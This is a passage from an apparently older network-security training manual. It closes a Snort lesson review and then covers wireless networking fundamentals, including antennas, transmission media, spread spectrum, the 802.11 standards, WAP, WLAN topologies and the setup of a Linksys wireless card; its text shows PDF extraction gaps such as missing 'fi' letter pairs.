Lesson Review
8A What protocols does Snort support?
TCP, UDP, IP, and ICMP.
What are the four primary parts of the Snort.conf le?
Variables, preprocessors, output plug-ins, and rulesets
8B What must be installed in Windows prior to installing snort?
LibPcap for Windows (also known as WinPcap).
8C How do you negate an option in Snort?
By using the exclamation point (!) symbol.
8D What Snort le must you edit in order to have Snort connect to a data-
base?
Snort.conf
At the mysql prompt, what is the command to make a new database,
called snortdb1?
create database snortdb1;
8E What scripting does Apache need to have congured in order for your
BASE console to work?
PHP
What are the components of a LAMP server?
Linux, Apache, MySQL, and PHP
446 Tactical Perimeter Defense
Securing Wireless Networks
Overview
In this lesson, you will learn to implement and secure a wireless network.
You will examine the components of the network, and how to congure
these components. You will detail the security options required for making
wireless networks part of your trusted enterprise. You will perform wireless
network analysis using leading wireless tools, and examine how to create a
trusted wireless network.
Objectives
To secure a wireless network, you will:
9A Examine the fundamental issues of wireless networking.
You will identify and examine the equipment, media, and systems of
wireless networking.
9B Describe the fundamentals of wireless local area networks.
You will describe how WLANs function, including the 802.11 framing
options, the essentials of WLAN congurations, and the threats that exist
to the WLAN.
9C Implement wireless security solutions.
You will implement WEP, SSID broadcast disabling, MAC address lter-
ing, and WPA as security solutions to the wireless network.
9D Audit the wireless network.
You will use leading tools, such as OmniPeek Personal and NetStumbler,
to audit a wireless network.
9E Describe the implementation of a wireless trusted network, a wireless
PKI.
You will examine the components required to implement and the proce-
dure for implementing a wireless trusted network.
Data Files
dotnetfx.exe
NetStumblerInstaller_0_
4_0
Lesson Time
8 hours
LESSON
9
Lesson 9: Securing Wireless Networks 447
Topic 9A
Wireless Networking Fundamentals
Not too long ago, the concept of a network inside an office that had no wires run-
ning to and from the client computers seemed a bit far-fetched. Perhaps in the
future, many people said, but not for a while. Fast forward only a few short
years, and you are in the future. Wireless networks are here now.
The idea now of a mobile workforce, able to move through an office, city, or
country, and connect no matter where they are located has become very desirable
to many organizations. The enterprise network now must include options for users
to move, and have their connection stay with them.
In addition to the idea of a mobile workforce, other factors are pushing the
implementation of wireless networks. New networks can be deployed faster, and
often cheaper, if they are wireless versus wired. Buildings where running cable is
cost prohibitive, such as offices across a street or city block, are nding wireless
the best option. Companies that have chosen architectural buildings for their
appearance may nd those buildings marked as historical landmarks, and running
cables may not be allowed. All of these reasons will make the option of a net-
work without wires seem like the perfect solution.
But what may seem like a perfect solution has serious issues upon closer
inspection. Even though the network experience may seem the same to end users,
there are major differences in wireless networks from their wired counterparts.
Where two computers communicating in a wired network have a single cable
connecting each end point, there is no such cable for the wireless network.
It is this lack of cable that causes the problems. For most enterprises, not much
of the security policy and effort will be spent on the physical medium. There may
be systems in place to try to prevent cable splicing, or physical security systems
that guard the cable. The wireless network cannot employ these systems.
Wireless Equipment
As you may expect, there are unique pieces of equipment used to run the wireless
network. Although many of these pieces perform tasks similar to their wired
counterparts, the wireless network equipment requires specic examination. The
physical pieces used in the wireless network require careful placement because
the location of the devices can affect security and performance of the network.
Access Points
The centerpiece, literally, of the wireless network is the Wireless Access Point.
The full acronym for this is WAP, but in the context of this lesson, the acronym
AP (for access point) will be used. This is to eliminate confusion with the other
wireless networking acronym of the same name, which is Wireless Application
Protocol.
The function of the AP in the wireless network is similar to that of the switch in
the wired network. Individual components of the network communicate to and
from the AP in order to communicate with other network components. Each AP
will have at least one, and usually two antennas. By having multiple antennas, the
AP is able to cancel out any duplicating radio waves that may reach the AP.
448 Tactical Perimeter Defense
Figure 9-1: Linksys Wireless Access Point, model: WAP54G.
Wireless Network Cards (WNIC)
Just as a network card is required to connect to the cable in the wired network, a
network card is required to connect to the wireless network media. These cards
can be installed in desktop or laptop computers, or even embedded into
appliances. The majority of newer laptop computers have built-in wireless net-
work capability options as well.
Figure 9-2: Netgear wireless network card.
Antennas
Whereas the AP of the wireless network is similar to the switch in the wired net-
work, and the network cards of both the wireless and wired networks have the
same functionality, there is one component of the wireless network that is not
found in the wired networks. This component is the antenna.
The antenna itself becomes an extension of the transmitter or receiver. When an
access point transmits a signal it is passed from the internal signal generation
components to the antenna, then transmitted through the air to a receiving
antenna, which pulls the signal into the device.
You can use an antenna that is designed to increase its ability to pull in a good
signal in its construction and aiming. This increase is called the gain of the
antenna. Although there are many subtypes of antennas, there are three common
types of antennas used to increase the range of wireless networks. These are the:
yagi, parabolic, and omni-directional antennas.
The yagi antenna is one that is designed to be very directional. Yagi antennas
may be enclosed in a tube, as shown in Figure 9-3, or they may be open, like the
traditional over-the-air television antennas. Yagi antennas are perfect for direct
point-to-point communication, such as a bridge connecting two offices.
Lesson 9: Securing Wireless Networks 449
Figure 9-3: A yagi antenna, manufactured by Telex Wireless.
The second common antenna is the parabolic antenna. This antenna is also a
good choice for bridging two networks, and has a greater range than the yagi
antenna. The parabolic dish antenna is able to create gains that can be twice that
of the yagi antenna.
Figure 9-4: A parabolic dish antenna, manufactured by Telex Wireless.
450 Tactical Perimeter Defense
The third common antenna is the omni-directional antenna. The omni-directional
antenna is often used in conjunction with an AP to increase the local connection
ability of the wireless network. This antenna type is usually mounted high above
the group of end points that will communicate with the wireless network. The
gain of the omni-directional antenna can approach that of some yagi antennas, but
is quite a bit less than the gains of the parabolic antennas.
Figure 9-5: An omni-directional antenna, manufactured by Telex Wireless.
Association
A unique aspect of the wireless network is that nodes that are going to use an
access point must rst associate with an access point. In the wired network, the
node is simply turned on and plugged into the cable, there is no association
required for the local hub or switch. In the wireless network, the node must be
turned on, and then associate, or join, a wireless access point.
This process of association is accomplished by the wireless node knowing what
its alphanumeric identier is, and looking for an alphanumeric identier that
matches. The vast majority of network cards now include an option that scans the
local radio waves and lists the possible networks that the WNIC can attempt to
associate with. It is an attempt to associate rst; the WNIC must be authenticated
as well, and then association can be successful.
Wireless Media
In the traditional network, the cable can be guarded and cable runs carefully con-
trolled; in the wireless network there is no cable. This presents the problem of
wireless security in a very general way. The problem is how to secure that which
you cannot see, and cannot control.
Lesson 9: Securing Wireless Networks 451
Although the media cannot be seen, there are similarities between the wired and
wireless networks. In both networks, a signal is sent from one computer to
another computer, there must be a common method of communication, and there
must be a common method of delivery and receipt.
In the wireless network, the media used to carry the signals from one wireless
device to another can vary. In this course, you will examine the three wireless
media: infrared, microwave, and radio waves. There are signicant differences in
these media, in how they work, and what they can do for your network.
Figure 9-6: The electromagnetic spectrum.
452 Tactical Perimeter Defense
Infrared Wireless Media
Infrared wireless technology has been around for many years. The most common
example of infrared technology is in electronic remote controls. The signals used
for infrared signals are in the terahertz range, and this allows for solid
communication. The infrared signal is pure light, usually electromagnetic waves
or photons from a small section of the electromagnetic spectrum.
Infrared is a simple wireless technology that uses pulses of light. If a binary one
is required, the light is on; if a binary zero is required, the light is off. An emitter
on one device (normally an LED) sends the light and a detector receives the light
signal and reproduces the correct signal (either the one or the zero). The two
common methods of wireless infrared communication are line-of-sight and dif-
fused (also called broadcast).
Line-of-sight (sometimes called point-to-point) requires the emitter and detector
to be directly in line with each other. If any object passes between the two points,
no matter how brief, the line-of-sight is broken and the transmission will be
interrupted. Due to this, any networking service that requires high degrees of reli-
ability will likely not use this implementation.
Infrared is most often used today to network devices such as digital cameras,
scanners, PDAs, and other devices to computers. These types of devices can be
held in close proximity to one another so the odds of an object getting between
the emitter and detector are very low.
From a security perspective, infrared line-of-sight is an acceptable choice. This is
because the single beam between the two end points must be constant. There is
no sniffing option, as the light beam is direct and focused. It is possible to split
the beam, but that would require physical access to the beam between the two
end points.
The beam splitter is often a prism, normally designed as a right-angle triangle,
with a mirror on a 45-degree surface. The beam goes through the prism, and
reects a small amount of the signal to a third point. This third point can then put
the signal back together. Note, the splitter must be physically placed in the beam,
so any enterprise with adequate physical security should prevent this type of
sniffing.
Figure 9-7: A beam splitter.
Lesson 9: Securing Wireless Networks 453
Although the prism is the most common form of a beam splitter, there are also
beam splitters that are simple mirrors with a high degree of translucency. The
mirror is placed at an angle in the stream, and functions just as the prism does.
Just as the line-of-sight cannot be sniffed, the infrared signal cannot penetrate
walls, therefore, the infrared transmission cannot be listened in on from a neigh-
boring room or outside office. Another strong point for the infrared line-of-sight
is that outside interference is minimal; other radio waves will have no noticeable
effect on the signal.
The security advantages of infrared wireless are offset by the limitations of
infrared. Infrared cannot provide any mobility to the devices, and the pure line-
of-sight issue causes too much disruption in most office settings.
Similar to local line-of-sight, infrared networks are laser communications. Laser
communications work by using a powerful directed beam between two points,
with the unique difference being that the distances covered are much greater.
Laser line-of-sight transmissions can cover miles, as long as the direct and unin-
terrupted line-of-sight is clear and available.
Diffused infrared technologies overcomes some of the limitations of the line-of-
sight communication. In the broadcast network, there still are two end points, the
emitter and detector. However, the emitter does not send the signal directly to the
detector. Instead, the signal is sent out to the network, and can bounce off walls
and other objects in the room. The detector receives the signal and processes the
information just as if it were line-of-sight.
A big difference between line-of-sight and diffused infrared is speed. Because the
signal has to travel farther and bounce off surfaces, it is a weaker signal when the
receiving node detects the transmission. A second difference is that because the
signal is broadcast, end points other than the intended recipient are able to
receive the transmission.
These issues combine to limit most use of infrared in wireless networking to the
small local devices. As more and more people use small devices, you can expect
infrared technology to remain a part of wireless networking for some time.
Microwave Wireless Media
Where as infrared wireless networking serves the individual devices, such as
PDA communication to a PC, it is usually not used to build the network
infrastructure. One of the technologies that is used for this purpose is microwave
technology.
Microwave wireless networks allow for two end points to be placed far apart
from one another. The connection is still made between two end points, one send-
ing and one receiving node. There are two main types of microwave systems
used in wireless networking: terrestrial and satellite.
Terrestrial microwave systems usually use a directional antenna to send and
receive network transmissions directly from one to another. These systems are
designed to be direct line-of-sight, although they can use relay towers to extend
the range or to move the signal around obstacles. Weather can have an affect on
these signals, although not to the degree the weather has on infrared.
Depending on the laws in your area, you may need to get a license to operate a
microwave transmitter. There are usually strengths and frequencies that do not
require licensing. Even though it may not be required, you may wish to pursue
licensing so you can protect the frequency for that area, and prevent others from
using the same frequency.
454 Tactical Perimeter Defense
Satellite Microwave
When you have extreme distance to cover, the only choice is satellite. Satellites
are the equivalent of the transmitter and receiver stationed high in the sky. By
placing the transmitter and receiver higher, more ground can be covered by the
same point. This allows an enterprise with one office in New York to have a
single hop to a second office in London.
Figure 9-8: Example of satellite microwave networking.
There are multiple orbits a satellite might take around the Earth. Geostationary
orbits (GEOs) are those that circle Earth directly above the equator. A benet of
gravity and orbiting is that once at a specic point, the geostationary satellite will
achieve a xed position. This position is approximately 22,200 miles (or 36,000
km) above the Earths surface. Being placed at such an altitude, the satellite will
be able to cover about one-third of the Earths surface. You could, therefore,
place three satellites 120 degrees apart and cover the entire planet, except for the
extreme northern and southern latitudes. Today there are hundreds of GEOs in the
sky above you.
There is also an orbital pattern called the Highly Elliptical Orbits (HEOs). These
orbits do not orbit the Earth in a circle around the equator. Instead, these satellites
orbit in an oval-shaped pattern. The oval is not equal around the Earth, instead
the satellite will pass close to the Earth (at its closest, is called the perigee of the
orbit), and will then move further away from Earth (at its furthest, it is called the
apogee of the orbit).
Lesson 9: Securing Wireless Networks 455
Finally there are Low Earth Orbits (LEOs). These orbits are between 124 and
15,900 miles above the Earths surface (between 200 and 25,589 km). Most of
the satellites in this range are at the low end, from 124 to 1,490 miles (200 to
2,400 km). These satellites can move very fast, and can be visible with the naked
eye standing on Earth. A satellite in LEO may be able to circle the entire earth in
90 minutes. LEOs are not restricted to equatorial orbits.
TASK 9A-1
Examining Satellite Orbits
1. Open Internet Explorer, and connect to http://science.nasa.gov/Realtime/
JTrack/3D/JTrack3D.html
2. In the dialog box asking you to perform an install, click No. Wait for a
moment, the JTrack satellite applet will open and load satellite data.
3. Maximize the applet.
4. Once the applet loads, press Ctrl and click the mouse (Ctrl-click) to
move the Earth back and to see the orbital path of the GEOs. Examine the
distance to the GEO orbits in relation to the size of the Earth.
5. Click any small white dot to see the orbital path of the satellite.
6. Click the mouse in the applet and drag to rotate the Earth and notice the
GEOs all are lined in a similar pattern.
7. Ctrl-click until the Earth is small in the applet.
8. Click a white dot that seems further away from Earth, and not in the
same circle pattern of the GEOs.
9. Try to nd Chandra, AO-40, and Integral. Examine the orbital patterns
of these HEO satellites.
10. Shift-click to move in towards Earth until the continents are clearly
visible.
11. Click any white dot that is near Earth, and examine the orbital patterns
of these LEO satellites.
12. Shift-click until the Earth lls the applet window.
13. Choose OptionsUpdate Rate
1
4 Second.
14. Choose OptionsTimingReal-time.
15. Note the movement of the satellites in LEO.
16. Choose OptionsTimingX100.
17. Note the movements of the LEO satellites at 100 times real-time speed.
456 Tactical Perimeter Defense
18. When you have nished examining the orbital patterns of the satellites, close
the JTrack3d Applet and close Internet Explorer.
19. What type of satellite orbit, the LEO or the GEO, will introduce the
largest delay in packet transmission?
The GEOs produce the highest delay in packet transmission. You may be
able to get high speeds, but the distance alone dictates that there will be
considerable delay in the network packet transmission.
Radio Wireless Media
Although infrared and satellite communications have their place in the wireless
world, the emphasis today in regards to security is on radio waves. This is
because the vast majority of wireless network communications take place on
radio waves. Although people often think of the analogy of water waves, this is
not quite accurate. Radio waves do not require a physical surface, such as the
water wave. Rather, the radio waves ride on an electromagnetic (EM) wave,
referred to as the EM eld. Waves in the electromagnetic spectrum move at the
speed of light, or 186,000 miles per second. There is similarity with the water
wave in dissipation, however.
If you throw a rock into water, a wave starts in a circular pattern and radiates out
from where the rock entered the water. The circular waves get smaller, or dissi-
pate, as they get farther away from the source. Radio waves are similar. They are
broadcast from a source, and radiate out away from the source. The farther away
from the source, the weaker the signal becomes, until it cannot be located.
In the water, waves reect off of surfaces, and can even bounce back onto
another wave. This can happen with radio waves as well. If two waves collide at
the right time, with both waves at their peak, the end result is that the waves are
added (called in phase), resulting in a bigger wave. If two waves collide at the
right time, with one wave at a peak and one wave at a trough (called out of
phase), the end result is that the waves cancel each other out.
Reecting waves can cause problems for wireless networks, therefore, the device
manufacturers have addressed this issue. One problem is that a signal can be
broadcast, and due to bouncing off surfaces, will reach the access point multiple
times and at different times. These bouncing waves cause interference, and in
wireless networking this is called multipath interference. By using multiple anten-
nas on the access point, the access point is able to compensate for the reception
of multipath interference.
Another form of interference that wireless networks must deal with is RF interfer-
ence in the EM eld. Devices such as cordless phones and microwave ovens
produce signals in the EM eld that are used by the wireless network. Devices in
the 900 MHz and 2.4 GHz ranges are in the Industry, Science, & Medical (ISM)
band, while devices in the 5 GHz range are in the Unregulated National Informa-
tion Infrastructure (U-NII) band. The technology used to minimize the effect of
these other devices is called spread spectrum technology.
Spread Spectrum
Spread spectrum technology allows for bandwidth to be shared by multiple
devices, so your microwave and wireless network are not going to battle over the
exact same frequency at the exact same time. Spread spectrum works by splitting
the information over multiple channels of communication. By splitting the infor-
Lesson 9: Securing Wireless Networks 457
mation over different channels, if a person is sniffing one specic channel, they
will not get useful information from that channel, only tiny pieces of larger
transmissions. There are two primary methods of spread spectrum used in wire-
less networks: Frequency Hopping Spread Spectrum (FHSS), and Direct
Sequence Spread Spectrum (DSSS).
Frequency Hopping Spread Spectrum (FHSS)
During World War II, the emphasis on secure communications and transmissions
was extremely high. Hedy Lamar and George Anthell came up with the idea of
FHSS to keep enemies from jamming radios. The idea was to use a range of fre-
quencies, and to send (or burst) a short amount of information on one frequency,
then switch to another frequency, send (burst) some information, then switch fre-
quencies again and send another burst of information, and so on.
Figure 9-9: Multiple signal bursts sent as an example of FHSS.
During FHSS, the time that is spent on any one frequency is called the dwell
time, and the amount of time that it takes to move from one frequency to another
is called the hop time. A device using FHSS will transmit on the designated fre-
quency and then move to the next frequency using the pre-dened sequence.
Once the device reaches the last frequency, the device loops to the rst frequency
and starts the process over again. The sequence of frequency hopping creates a
single channel.
Direct Sequence Spread Spectrum (DSSS)
The DSSS system works differently from FHSS. Instead of hopping from one
frequency for a burst, and then another, DSSS transmits on multiple frequencies
together. These multiple frequencies are grouped together and called a band.
Instead of sending the raw data, DSS performs an XOR calculation on the data at
transmission.
458 Tactical Perimeter Defense
Figure 9-10: The XOR process of DSSS communications.
This added data used in the XOR process is called the chipping code. By adding
these codes, the original data is spread out, which increases the likelihood that the
data will be received properly. The number of bits (chips) in the chipping code
compared to the raw data is referred to as the spread ratio; higher spread ratios
means higher chances of successful communication. The 802.11 specications
dictate that there are to be 11 chipping bits per raw data bit. Due to issues such
as the use of multiple frequencies, and the inclusion of the chipping code, DSSS
is able to achieve higher rates of transmission than FHSS.
You should not think of either FHSS or DSSS as better than one another. Instead,
you should realize that they are used for different functions. FHSS generally costs
less to build, is used for devices that require shorter transmission distances, and
has a lower overall speed. DSSS generally cost more to build, is used in devices
that require greater transmission distances, and offers greater speed. From an
administrative viewpoint, you may never deal directly with spread spectrum
issues, they are more in the realm of the product manufacturer.
Bluetooth
Although it is the most common technology for wireless networking, 802.11 is
not the only wireless standard. Another common standard is Bluetooth. Bluetooth
devices are generally FHSS devices, and are used in close proximity from one
another.
Bluetooth has found a market in device-to-device communications, such as PDA
to computer, computer to a printer, automobile to phone headset, and so on.
Bluetooth functions in the 2.4 GHz range, and has low-speed bandwidth, when
compared to 802.11 standards, especially 802.11g. For these reasons, Bluetooth is
not designed to be directly competitive with 802.11, rather a complimentary tech-
nology used for different purposes.
Short Message Service
As devices continue to become smaller, and as people expect to be able to do
more with their devices, new technologies are required. In wireless networking,
one of these technologies is called the Short Message Service (SMS).
Lesson 9: Securing Wireless Networks 459
SMS is used to send and receive the short (up to 160 characters) text-only mes-
sages on devices like cell phones, pagers, and PDAs. This technology uses a store
and forward system, which means that if the intended recipient is not available,
the message can be stored for later transmission.
Nearly all providers of cellular services offer support for SMS today, and security
problems exist here just as they do with all other forms of wireless
communication. Although SMS security is out of the scope of this course, here
are a few examples of SMS security issues:
A Norwegian company found that a specic message sent via SMS to cer-
tain cell phones would freeze the phones, with the only solution being to
remove the batteries.
A virus called Timofon.A sends short SMS messages to random numbers. By
itself, this is not a true virus, as users have to run a VBS script, but it hints
at the potential.
SMS Bombers are being built to ood networks with messages.
IEEE 802.11
All forms of networking that have any success are built upon standards, and wire-
less networking is no different. The primary standard in the world of wireless
networking is the 802.11 standard. The 802 LAN standards committee was cre-
ated in 1980 by the Institute of Electrical and Electronic Engineers (IEEE), and in
1990 the committee created the 802.11 working group to discuss and dene
issues surrounding wireless networking.
In 1997, the 802.11 working group nalized their rst standard. The IEEE 802.11
standard was to address the Media Access Control (MAC) and Physical (PHY)
Layers of network communication. 802.11 described three specic types of trans-
missions to take place at the PHY Layer:
Diffused Infrared, utilizing infrared transmissions.
Direct Sequence Spread Spectrum (DSSS), utilizing radio transmissions.
Frequency Hopping Spread Spectrum (FHSS), utilizing radio transmissions.
The 802.11 working group quickly found that the project was growing at such a
rate, and the amount of issues to discuss was growing. The solution to this prob-
lem was to create subgroups to handle each issue independently. These groups
have been assigned a letter and appended to the 802.11 name. Several of these
groups have produced standards that are used in the industry today, others are on
the horizon, and others still will become obsolete.
802.11a
In 1999, IEEE approved the 802.11a standard, calling it: High-speed Physical
Layer in the 5 GHz Band. This standard utilizes Coded Orthogonal Frequency
Multiplexing (COFM), and supports multiple data transmission rates. Supported
rates are: 6, 9, 12, 18, 24, 36, 48, and 54 Mbps. Two 802.11a devices will con-
nect using the fastest data rate (based on things like distance between nodes and
signal strength), with a maximum rate of 54 Mbps. Work on this standard is con-
sidered complete.
460 Tactical Perimeter Defense
802.11b
Also published in 1999, but slightly ahead of 802.11a, was the IEEE approved
802.11b standard, called: Higher-speed Layer Extensions in the 2.4 GHz Band.
This standard utilizes High-Rate Direct Sequence Spread Spectrum (HR-DSS),
and supports multiple transmission rates. Supported rates are: 1, 2, 5, and 11
Mbps. Work on this standard is considered complete.
802.11c
The 802.11c working group was developed to manage MAC bridging operations.
This type of standard is used by developers of hardware. The 802.11c working
group on its own is complete, with continued discussion on this subject folded
into the 802.11d working group.
802.11d
As wireless networking came on the scene, and the 802.11 standard was avail-
able, there were only a few economies (such as the United States, Europe, and
Japan) that had regulations on the use of the radio waves. In order for wireless
networking to become global, standards would be required that comply with regu-
lation of transmissions in various countries. The 802.11d working group is
focused on the international regulations for the use of wireless networking.
802.11e
An important issue in all of networking is Quality of Service (QoS). By ensuring
high QoS, transmitting other types of information such as audio and video can be
accomplished through a wireless network. The 802.11e group is working on stan-
dards to prioritize network traffic through the wireless network, to improve QoS.
802.11e addresses the MAC layer, and as such it will be compatible with all
802.11 PHJY networks.
802.11f
The development of the original 802.11 standard did not address the communica-
tions between individual access points. This was done to provide for the
maximum exibility in an enterprise implementing various vendors products.
This causes difficulty though, when there are many different types of vendor
equipment in the network, that may have different methods of communicating.
802.11f is working to dene the standards of communication between access
points so that roaming wireless clients do not experience network problems, or
have communications cut off. It is suggested that until this standard is complete,
and all vendors comply, that you should use a single vendor to provide your
wireless infrastructure.
802.11g
A problem that developed during the initial standards process was that 802.11a
and 802.11b did not communicate. So, although the ability to add the higher
bandwidth of 802.11a was appealing to some, the lack of interoperability discour-
aged others. 802.11g provides the standards to provide higher speed, while being
able to interoperate with other wireless networks. 802.11g utilizes OFDM to man-
age communications, provides for transmission rates of up to 54 Mbps, and
operates in the 2.4 GHz range.
Lesson 9: Securing Wireless Networks 461
802.11h
Specic European regulatory issues are discussed in the 802.11h working group.
In Europe, there is a strong possibility that 802.11a devices, which operate in the
5 GHz range, will interfere with satellite communications, which are designated
as primary use. Many European countries label wireless networking as secondary
use.
802.11i
There are serious security issues associated with wired equivalent privacy (WEP).
The 802.11i working group was designed to address these issues. The result of
the groups efforts is a stronger security standard, including all the options that
exist in Wi-Fi Protected Access (WPA), and adding the use of the Advanced
Encryption Standard (AES). Some, including the Wi-Fi Alliance refer to 802.11i
as WPA2.
802.11n
With the ever-growing demands on wireless networks, speed is always an issue.
The 802.11n working group develops enhancements to wireless networking tech-
nologies to achieve a higher throughput. The speed estimates out this standard at
a 200+ Mbps rate. Through the use of multiple antennas, some vendors are claim-
ing speed into the 400+ Mbps range.
Wireless Application Protocol
The Wireless Application Protocol (WAP), detailed at the Wapforum
(www.wapforum.org), is a specication that is open and utilized globally.
Handheld devices, such as mobile phones, pagers, and PDAs, can interact with
networks, such as the Internet through WAP. It is compatible with many wireless
networking technologies including Code Division Multiple Access (CDMA), Time
Division Multiple Access (TDMA), and Global Systems for Mobile Communica-
tions (GSM).
Since WAP is a protocol and application environment, it has the ability to be built
into any operating system that is designed to use it. It is currently used in operat-
ing systems such as: WindowsCE, PalmOS, JavaOS, and OS/9.
Mobile devices work by using WAP microbrowsers that are built into the device.
These are similar to the full-scale Internet browsers, such as Netscape and
Internet Explorer, only scaled down to the minimum requirements. Many mobile
devices can communicate via HTML and/or XML, but there is a language speci-
cally for the wireless devices. That language is called Wireless Markup Language
(WML). WML is based on XML, and web content accessed via WML will have
the .wml extension, similar to the .html extension of web pages.
The programming of WML looks very similar to that of HTML or XML. There
are in fact XML tags in WML pages. The following code example shows what
two WML cards look like in a WML deck:
As of this writing, there was
an estimated 855 million
worldwide GSM users, 162
million CDMA users, and
124 million TDMA users.
web pages written in WML
are called decks, and decks
are constructed using cards.
462 Tactical Perimeter Defense
<wml>
<card id="no1" title="Card 1">
<p>Hello World!</p>
</card>
<card id="no2" title="Card 2">
<p>This is the second card text!</p>
</card>
</wml>
WAP itself, like all specications, has gone through several versions since it was
rst introduced. WAP v1.0 was introduced in April 1998, WAP v1.1 in June 1999,
WAP v1.2 in November 1999, and WAP v2.0 in the summer of 2001. The 1.0
version of WAP used a WAP gateway, often a separate computer to act as the
literal gateway between the WAP client and the web server hosting the les.
Figure 9-11: The original WAP architecture.
In the original WAP architecture, protocol conversion was required at the WAP
gateway. This is due to the WAP devices not speaking the language of the
Internet. With WAP v2.0 devices, the gateway protocol conversion is not required.
This is due to devices running the WAP v2.0 stack being able to utilize TCP/IP,
and speak through a proxy to the Internet.
Lesson 9: Securing Wireless Networks 463
Figure 9-12: The two common stacks of WAP.
TASK 9A-2
Choosing a Wireless Media
1. You have been contracted to design the wireless network for your new
client. This client has three offices, all within the same two-block radius.
They are three independent offices, each in a multistory building, which do
not require frequent resource access to any of the other offices. The only
authorized communications that can be sent from one office to another are
email or other approved instant messages.
There are some slight obstructions, such as trees, that prevent perfect line-of-
sight between all three buildings. You have asked the client, and have been
informed that removal of the trees is not permitted.
Based on this information, which media type will you recommend to the
client, and why?
You will recommend using radio waves as the media, by conguring the net-
works to use radio waves and a directional antenna, such as a yagi, to
increase the strength and range. The radio wave option should provide the
client with an inexpensive solution.
464 Tactical Perimeter Defense
Topic 9B
Wireless LAN (WLAN) Fundamentals
WLANs are built upon the 802.11 standards and are designed to operate similarly
to their wired counterparts, running the 802.3 (Ethernet) standard. One difference
(other than the lack of those pesky wires!) is that 802.11 networks use Carrier
Sense Multiple Access/Collision Avoidance (CSMA/CA), whereas the 802.3 net-
works use Carrier Sense Multiple Access/Collision Detection (CSMA/CD).
In the CSMA/CD networks, the nodes listen to the wire to see if it is clear to
transmit. Since the 802.11 nodes are not on a single physical media like the 802.3
networks, CSMA/CD will not work. Instead, the WLANs use CSMA/CA where
each node sends a short broadcast preceding each transmission.
The Access Points
The AP in the network is what the end nodes will be communicating within the
network. Placement of the AP can have a signicant effect on the overall speed
and transmission in the WLAN. If the AP is placed near a source of high EMI,
then the network will be negatively affected. Likewise, the height of the AP may
have an effect.
For many network administrators, the AP placement is a process of trial and
error. First decide on the placement as best you can by analyzing the layout, try-
ing to avoid anything that will cause interference. After the AP is placed, run
bandwidth tests from various locations, where the end nodes will likely be
located. Then, move the AP to a different location, perhaps moving it higher on
the wall, and run the bandwidth tests again. After you have run a group of tests,
you will know the optimal placement for your unique situation.
SSID
Wireless networks have a component called the Service Set Identier, or SSID.
The SSID is a 32-character unique identier that gets attached to the header of
WLAN packets. The SSID is designed to identify individual WLANs, so that
devices connect to the proper WLAN.
This is a value that should be congured upon setting up security on a WLAN.
The SSIDs are well known for many manufacturers, and changing this value to
one that is not well known is one of your initial steps in your WLAN security.
Access Points are congured, usually by default, to broadcast their SSID in what
are called beacon frames. This function allows authorized users to nd their
proper WLAN easily, but also informs any attacker the name of the WLAN
segment. The beacon frames are broadcast in plaintext; there is no encryption of
these transmissions. Most WLAN analyzing software will listen for SSID beacon
frames, and report that information back, making the location of the networks
simple. If your network will allow for it, you should turn off the SSID beacon
frame broadcast.
Lesson 9: Securing Wireless Networks 465
Association
A unique aspect of the wireless network is that nodes that are going to use an
access point must rst associate with an access point. In the wired network, the
node is simply turned on and plugged into the cable, there is no association
required for the local hub or switch. In the wireless network, the node must be
turned on, and then associate or join, a wireless access point.
This process of association is accomplished by the wireless node knowing what
its SSID value is, and looking for an SSID value that matches its known value.
The vast majority of network cards now include an option that scans the local
radio waves and lists the possible networks that the WNIC can attempt to associ-
ate with. It is an attempt to associate rst; the WNIC must be authenticated as
well, and then association can be successful.
Authentication
One step in the WLAN client being able to use the WLAN is association, but that
may not be enough. The second step that may be required in the network is
authentication. Authentication can happen in one of two general methods, as per
the IEEE 802.11 specication: open system authentication and shared-key
authentication.
Open system authentication is simply when there is no encryption and all com-
munication is done in clear text. The WLAN client can authenticate in the open
system without having to know any key information. In the shared-key authenti-
cation system, a key is required, and the key system must be used on both ends
of the communication, meaning both the AP and the WLAN client must be using
the same system.
WLAN Topologies
When building your WLAN, you have two major types of networks to build. You
can build a WLAN in either ad-hoc mode or in infrastructure mode. Neither of
these topologies are right or wrong, they just have different functions.
Ad-hoc Mode
The ad-hoc is perhaps the fastest WLAN to build. No APs are required from the
ad-hoc mode WLAN. In this case, you install and congure the wireless network
card on multiple end nodes, and they all have the ability to interact directly with
any other node. This is a true peer-to-peer network with no single point in
control.
Association is the process of
a WLAN client associating
with an AP in the WLAN.
466 Tactical Perimeter Defense
Figure 9-13: An example of an ad-hoc WLAN conguration.
When you group several end nodes together in the ad-hoc mode those nodes cre-
ate what is called an Independent Basic Service Set (IBSS). These nodes are
grouped together by all using the same SSID.
Infrastructure Mode
Although the ad-hoc mode may be the fastest for you to set up, it is not likely
the mode you will use in a production environment. In the enterprise, you are
much more likely to use the infrastructure mode. In the infrastructure mode, your
network clients are congured with the SSID of an AP. All the clients who are
going to be grouped together have the same SSID. The AP then acts as the cen-
tral point in the network.
The request of each node is received by the AP, and then transmitted to the
network. If you have a single AP, that does not overlap with any other WLAN
segments, then you have created a Basic Service Set (BSS). You can create an
Extended Service Set (ESS) by grouping BSS to form a single subnetwork.
Just about all APs that are made today have at least one Ethernet port on them,
allowing you to seamlessly connect your wired clients into your wireless network.
You will usually connect the Ethernet port of the AP to a hub, switch, or other
network connecting device.
Lesson 9: Securing Wireless Networks 467
Figure 9-14: An example of an infrastructure mode WLAN conguration.
Lesson Configuration
There is quite a bit of hardware used in this lesson. For the tasks and screenshots
there were multiple WNICs and APs used, and both ad-hoc and infrastructure
mode will be used. For this lesson, there are two congured clients, one Linksys
WPC54G and one Netgear WPN824, used in laptop computers.
Prepare for the Ad-hoc Network
The rst network type you will congure is an ad-hoc network. This will allow
for a small network to be established in a very short amount of time. This rst
network will not have security running, and can be viewed as a guide of the steps
required to get an ad-hoc network operational. In this rst task, you will cong-
ure the Linksys 54G card, which can run 802.11b and 802.11g.
Note as most of the machines you will congure wireless networking upon
will be clients, these tasks have been written using laptops running Windows XP.
For the SCP certications questions about the wireless networks are based on the
wireless tools and techniques shown here, not on the built-in Windows wireless
networking solution.
468 Tactical Perimeter Defense
TASK 9B-1
Installing the Linksys WPC54G WNIC
Setup: This task is performed on the rst Windows XP laptop.
1. Log on to Windows XP Professional.
2. Insert the Linksys WPC54G setup CD-ROM into the CD-ROM drive. If
the setup program does not autorun, navigate to the CD, and double-click
the Setup.exe le.
3. In the Linksys Welcome screen, click the Click Here To Start button.
4. Read the License Agreement, and click Next. The setup les will now be
installed to your computer.
5. When prompted, insert the WNIC into the computer, then click Next.
6. The Linksys Available Wireless Network screen will open. Click the
Manual Setup button to create a prole.
